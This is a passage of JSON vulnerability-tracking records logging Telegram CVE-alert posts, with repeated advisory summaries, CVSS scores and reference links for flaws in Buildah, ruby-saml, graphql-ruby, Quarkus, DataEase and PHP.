https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "145614c8-7b1a-46c6-aa90-abb702b28ea8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8690", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "2d47ae1a-0157-4356-83cd-15b06815eade", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8563", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "680ff49b-5606-4bf6-9b63-e34ab138c480", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8700", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "63d68eb8-23d9-4525-9f52-9c09e680020f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8709", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "319d6543-2a92-4466-be73-f4573856d58b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4VC4-M8QH-G8JM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7376", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25291\n\ud83d\udd25 CVSS Score: 8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. An authentication bypass vulnerability was found in ruby-saml prior to versions 1.12.4 and 1.18.0 due to a parser differential. ReXML and Nokogiri parse XML differently; the parsers can generate entirely different document structures from the same XML input. That allows an attacker to be able to execute a Signature Wrapping attack. This issue may lead to authentication bypass. Versions 1.12.4 and 1.18.0 fix the issue.\n\ud83d\udccf Published: 2025-03-12T20:16:12.181Z\n\ud83d\udccf Modified: 2025-03-12T20:24:28.868Z\n\ud83d\udd17 References:\n1. https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-4vc4-m8qh-g8jm\n2. https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv\n3. https://github.com/SAML-Toolkits/ruby-saml/commit/e76c5b36bac40aedbf1ba7ffaaf495be63328cd9\n4. https://github.com/SAML-Toolkits/ruby-saml/commit/e9c1cdbd0f9afa467b585de279db0cbd0fb8ae97\n5. https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.12.4\n6. https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.0", "creation_timestamp": "2025-03-12T20:42:37.000000Z"}, {"uuid": "084294db-3602-422f-b4df-ab38a805cea4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6G8Q-HP2J-GVWV", "type": "seen", "source": "Telegram/MF5Mb_KH9Dl27A-oSLc1JrD-xlLt5sgTckbUHyznbnX30sc", "content": "", "creation_timestamp": "2026-01-08T14:01:19.000000Z"}, {"uuid": "78f2f36c-106d-4bb0-bd02-0df1ba4f6db9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HW46-3HMR-X9XV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7376", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25291\n\ud83d\udd25 CVSS Score: 8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. An authentication bypass vulnerability was found in ruby-saml prior to versions 1.12.4 and 1.18.0 due to a parser differential. ReXML and Nokogiri parse XML differently; the parsers can generate entirely different document structures from the same XML input. That allows an attacker to be able to execute a Signature Wrapping attack. This issue may lead to authentication bypass. Versions 1.12.4 and 1.18.0 fix the issue.\n\ud83d\udccf Published: 2025-03-12T20:16:12.181Z\n\ud83d\udccf Modified: 2025-03-12T20:24:28.868Z\n\ud83d\udd17 References:\n1. https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-4vc4-m8qh-g8jm\n2. https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv\n3. https://github.com/SAML-Toolkits/ruby-saml/commit/e76c5b36bac40aedbf1ba7ffaaf495be63328cd9\n4. https://github.com/SAML-Toolkits/ruby-saml/commit/e9c1cdbd0f9afa467b585de279db0cbd0fb8ae97\n5. https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.12.4\n6. https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.0", "creation_timestamp": "2025-03-12T20:42:37.000000Z"}, {"uuid": "b26873be-2d6c-4f33-9742-b29b67c96106", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84XV-JFRM-H4GM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7390", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1485\n\ud83d\udd25 CVSS Score: 8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the decompression function of registry-support. This issue can be triggered if an unauthenticated remote attacker tricks a user into parsing a devfile which uses the `parent` or `plugin` keywords. This could download a malicious archive and cause the cleanup process to overwrite or delete files outside of the archive, which should not be allowed.\n\ud83d\udccf Published: 2024-02-13T23:31:14.427Z\n\ud83d\udccf Modified: 2025-03-12T23:49:04.173Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-1485\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2264106\n3. https://github.com/advisories/GHSA-84xv-jfrm-h4gm\n4. https://github.com/devfile/registry-support/commit/0e44b9ca6d03fac4fc3f77d37656d56dc5defe0d\n5. https://github.com/devfile/registry-support/pull/197", "creation_timestamp": "2025-03-13T00:43:13.000000Z"}, {"uuid": "cbad5083-7612-48b5-98ba-1f25a613ccd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-754F-8GM6-C4R2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7388", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25292\n\ud83d\udd25 CVSS Score: 8.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. An authentication bypass vulnerability was found in ruby-saml prior to versions 1.12.4 and 1.18.0 due to a parser differential. ReXML and Nokogiri parse XML differently, the parsers can generate entirely different document structures from the same XML input. That allows an attacker to be able to execute a Signature Wrapping attack. This issue may lead to authentication bypass. Versions 1.12.4 and 1.18.0 contain a patch for the issue.\n\ud83d\udccf Published: 2025-03-12T20:53:24.353Z\n\ud83d\udccf Modified: 2025-03-12T21:35:08.259Z\n\ud83d\udd17 References:\n1. https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-754f-8gm6-c4r2\n2. https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-hw46-3hmr-x9xv\n3. https://github.com/SAML-Toolkits/ruby-saml/commit/e76c5b36bac40aedbf1ba7ffaaf495be63328cd9\n4. https://github.com/SAML-Toolkits/ruby-saml/commit/e9c1cdbd0f9afa467b585de279db0cbd0fb8ae97\n5. https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released\n6. https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials\n7. https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.12.4\n8. https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.0", "creation_timestamp": "2025-03-12T21:40:48.000000Z"}, {"uuid": "c5fd7931-d25b-462a-9982-485e518081c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1082", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14537", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12397\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A flaw was found in Quarkus-HTTP, which incorrectly parses cookies with\ncertain value-delimiting characters in incoming requests. This issue could\nallow an attacker to construct a cookie value to exfiltrate HttpOnly cookie\nvalues or spoof arbitrary additional cookie values, leading to unauthorized\ndata access or modification. The main threat from this flaw impacts data\nconfidentiality and integrity.\n\ud83d\udccf Published: 2024-12-12T09:05:28.451Z\n\ud83d\udccf Modified: 2025-05-02T16:29:42.017Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0900\n2. https://access.redhat.com/errata/RHSA-2025:1082\n3. https://access.redhat.com/errata/RHSA-2025:3018\n4. https://access.redhat.com/security/cve/CVE-2024-12397\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2331298", "creation_timestamp": "2025-05-02T17:16:41.000000Z"}, {"uuid": "c4c798f9-1f31-413b-b9fc-eac5ee33a2ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WW85-X9CP-5V24", "type": "seen", "source": "Telegram/KVWOQnBiY3Eem9HhxjtYUT7TdVna0GpQEMRBO0Jx4tvF1fc", "content": "", "creation_timestamp": "2026-01-08T17:15:40.000000Z"}, {"uuid": "1fada945-4bbc-4f83-8ba4-81cb4e3f0f1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6JJ6-W25P-JC42", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7297", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-10838\n\ud83d\udd25 CVSS Score: 8.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: An integer underflow during deserialization may allow any unauthenticated user to read out of bounds heap memory. This may result into secret data or pointers revealing the layout of the address space to be included into a deserialized data structure, which may potentially lead to thread crashes or cause denial of service conditions.\n\ud83d\udccf Published: 2025-03-12T13:03:47.747Z\n\ud83d\udccf Modified: 2025-03-12T13:03:47.747Z\n\ud83d\udd17 References:\n1. https://github.com/eclipse-cyclonedds/cyclonedds/security/advisories/GHSA-6jj6-w25p-jc42\n2. https://github.com/eclipse-cyclonedds/cyclonedds/releases/tag/0.10.5\n3. https://gitlab.eclipse.org/security/cve-assignement/-/issues/46", "creation_timestamp": "2025-03-12T13:41:59.000000Z"}, {"uuid": "1e474d59-218d-4aad-bdef-06a2e97aa3d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R389-865G-HCG3", "type": "seen", "source": "https://t.me/securixy_kz/1030", "content": "", "creation_timestamp": "2026-07-13T00:00:34.147995Z"}, {"uuid": "ff0a185f-a833-4a4d-b94b-12e323e0727a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q92J-GRW3-H492", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7367", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27407\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: graphql-ruby is a Ruby implementation of GraphQL. Starting in version 1.11.5 and prior to versions 1.11.8, 1.12.25, 1.13.24, 2.0.32, 2.1.14, 2.2.17, and 2.3.21, loading a malicious schema definition in `GraphQL::Schema.from_introspection` (or `GraphQL::Schema::Loader.load`) can result in remote code execution. Any system which loads a schema by JSON from an untrusted source is vulnerable, including those that use GraphQL::Client to load external schemas via GraphQL introspection. Versions 1.11.8, 1.12.25, 1.13.24, 2.0.32, 2.1.14, 2.2.17, and 2.3.21 contain a patch for the issue.\n\ud83d\udccf Published: 2025-03-12T18:15:57.957Z\n\ud83d\udccf Modified: 2025-03-12T18:42:08.976Z\n\ud83d\udd17 References:\n1. https://github.com/rmosolgo/graphql-ruby/security/advisories/GHSA-q92j-grw3-h492\n2. https://github.com/rmosolgo/graphql-ruby/commit/28233b16c0eb9d0fb7808f4980e061dc7507c4cd\n3. https://github.com/rmosolgo/graphql-ruby/commit/2d2f4ed1f79472f8eed29c864b039649e1de238f\n4. https://github.com/rmosolgo/graphql-ruby/commit/5c5a7b9a9bdce143be048074aea50edb7bb747be\n5. https://github.com/rmosolgo/graphql-ruby/commit/6eca16b9fa553aa957099a30dbde64ddcdac52ca\n6. https://github.com/rmosolgo/graphql-ruby/commit/d0963289e0dab4ea893bbecf12bb7d89294957bb\n7. https://github.com/rmosolgo/graphql-ruby/commit/d1117ae0361d9ed67e0795b07f5c3e98e62f3c7c\n8. https://github.com/rmosolgo/graphql-ruby/commit/e3b33ace05391da2871c75ab4d3b66e29133b367\n9. https://github.com/github-community-projects/graphql-client", "creation_timestamp": "2025-03-12T19:41:15.000000Z"}, {"uuid": "af5718b0-158d-4683-954c-b3f4e2f2c46f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0360", "type": "published-proof-of-concept", "source": "Telegram/uxxdzZqKy2gVHqKwUzSTJZodHF1E_0u6px0vr0T-scLHYls", "content": "", "creation_timestamp": "2026-01-08T15:03:50.000000Z"}, {"uuid": "ecc81942-330d-40ef-99db-4b6e3f44c7f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XWH2-742G-W3WP", "type": "published-proof-of-concept", "source": "Telegram/uxxdzZqKy2gVHqKwUzSTJZodHF1E_0u6px0vr0T-scLHYls", "content": "", "creation_timestamp": "2026-01-08T15:03:50.000000Z"}, {"uuid": "dd081b8a-7ae7-475d-82ce-6f0e33d2fa30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WMFP-MJF3-57F5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7485", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24974\n\ud83d\udd25 CVSS Score: 7.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: DataEase is an open source business intelligence and data visualization tool. Prior to version 2.10.6, authenticated users can read and deserialize arbitrary files through the background JDBC connection. The vulnerability has been fixed in v2.10.6. No known workarounds are available.\n\ud83d\udccf Published: 2025-03-13T16:37:34.126Z\n\ud83d\udccf Modified: 2025-03-13T19:28:40.041Z\n\ud83d\udd17 References:\n1. https://github.com/dataease/dataease/security/advisories/GHSA-wmfp-mjf3-57f5", "creation_timestamp": "2025-03-13T19:42:47.000000Z"}, {"uuid": "b3bcd015-db7b-4284-a140-8664626cd30f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36FV-25J3-R2C5", "type": "published-proof-of-concept", "source": "Telegram/uxxdzZqKy2gVHqKwUzSTJZodHF1E_0u6px0vr0T-scLHYls", "content": "", "creation_timestamp": "2026-01-08T15:03:50.000000Z"}, {"uuid": "c6424801-be9f-4071-8e43-4712e9b7cbd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36HM-QXXP-PG3M", "type": "seen", "source": "Telegram/eK7Ikx8B4zhc3RXJcMY-EZtQzuwPO0YG4YMu0LZCUnsVEJo", "content": "", "creation_timestamp": "2026-01-08T16:03:29.000000Z"}, {"uuid": "c0548981-20f8-40ac-b357-e0192f01ac37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W8QR-V226-R27W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7557", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-5458\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: In PHP versions\u00a08.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, due to a code logic error, filtering functions such as filter_var when validating URLs\u00a0(FILTER_VALIDATE_URL) for certain types of URLs the function will result in invalid user information (username + password part of URLs) being treated as valid user information. This may lead to the downstream code accepting invalid URLs as valid and parsing them incorrectly.\n\ud83d\udccf Published: 2024-06-09T18:26:28.804Z\n\ud83d\udccf Modified: 2025-03-14T14:13:20.514Z\n\ud83d\udd17 References:\n1. https://github.com/php/php-src/security/advisories/GHSA-w8qr-v226-r27w\n2. http://www.openwall.com/lists/oss-security/2024/06/07/1\n3. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PKGTQUOA2NTZ3RXN22CSAUJPIRUYRB4B/\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W45DBOH56NQDRTOM2DN2LNA2FZIMC3PK/\n5. https://lists.debian.org/debian-lts-announce/2024/06/msg00009.html\n6. https://security.netapp.com/advisory/ntap-20240726-0001/", "creation_timestamp": "2025-03-14T14:45:11.000000Z"}, {"uuid": "e20e8420-aef7-4d94-9bdf-c8fd9ec52d92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HH26-4PPW-5864", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7559", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-2408\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The openssl_private_decrypt function in PHP, when using PKCS1 padding (OPENSSL_PKCS1_PADDING, which is the default), is vulnerable to the Marvin Attack unless it is used with an OpenSSL version that includes the changes from this pull request:  https://github.com/openssl/openssl/pull/13817  (rsa_pkcs1_implicit_rejection). These changes are part of OpenSSL 3.2 and have also been backported to stable versions of various Linux distributions, as well as to the PHP builds provided for Windows since the previous release. All distributors and builders should ensure that this version is used to prevent PHP from being vulnerable.\n\nPHP Windows builds for the versions\u00a08.1.29,\u00a08.2.20 and\u00a08.3.8 and above include OpenSSL patches that fix the vulnerability.\n\ud83d\udccf Published: 2024-06-09T19:55:51.625Z\n\ud83d\udccf Modified: 2025-03-14T13:58:57.829Z\n\ud83d\udd17 References:\n1. https://github.com/php/php-src/security/advisories/GHSA-hh26-4ppw-5864\n2. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PKGTQUOA2NTZ3RXN22CSAUJPIRUYRB4B/\n3. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W45DBOH56NQDRTOM2DN2LNA2FZIMC3PK/", "creation_timestamp": "2025-03-14T14:45:16.000000Z"}, {"uuid": "c2d2b6d2-e750-4837-b43c-917e3134e92c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C4CH-XW5P-2MVC", "type": "seen", "source": "Telegram/eK7Ikx8B4zhc3RXJcMY-EZtQzuwPO0YG4YMu0LZCUnsVEJo", "content": "", "creation_timestamp": "2026-01-08T16:03:29.000000Z"}, {"uuid": "8405293a-c656-41d1-9182-af091d279ddb", 